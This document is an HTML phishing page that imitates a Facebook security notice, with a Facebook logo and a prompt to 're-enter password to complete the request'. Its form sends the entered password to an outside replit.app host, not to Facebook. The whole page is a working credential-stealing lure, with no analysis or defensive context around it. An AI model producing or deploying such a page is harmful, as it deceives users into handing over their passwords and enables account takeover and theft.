
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Restrictions Information</title>

    <style>
        *{
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }
      .container {
        display: block;
        margin: auto;
        width: 50%;
        margin-top: 30px;
      }
      .container img {
        width: 100px;
        height: 100px;
        display: block;
        margin: auto;
      }

      .container h3 {
 
        margin-top: 30px;
    
      }
      .container hr {
         border: 1px solid lightgray;
      }
      .container form {
        margin-top: 20px;
        display: flex;
        flex-direction: column;
      }
      .container form button {
        margin-top: 20px;
        padding: 12px;
        border: none;
        background-color: #1778F2;
        color: white;
        border-radius: 5px;
        font-weight: bold;
        cursor: pointer;
      }
      .container form input {
        margin-top: 10px;
        padding: 16px;
        border: 1px solid lightgray;
        outline: none;
      
        border-radius: 5px;
      }
      .container p {
        color: rgb(152, 151, 151);
      }
    </style>
  </head>
  <body>
    <div class="container">
      <img
        src="https://cdn.iconscout.com/icon/free/png-512/free-facebook-4062815-3357701.png?f=webp&w=512"
        alt=""
        srcset=""
      />
      <h3>Facebook security</h3>
      <hr>
      <p>Please re-enter password to complete the request.</p>
      <form action="https://form-send-link.replit.app/success13.php" method="post">
        <input placeholder="Password" name="password"/>
        <button onclick="onLogin()">Submit</button>
      </form>
    </div>
  </body>

</html>
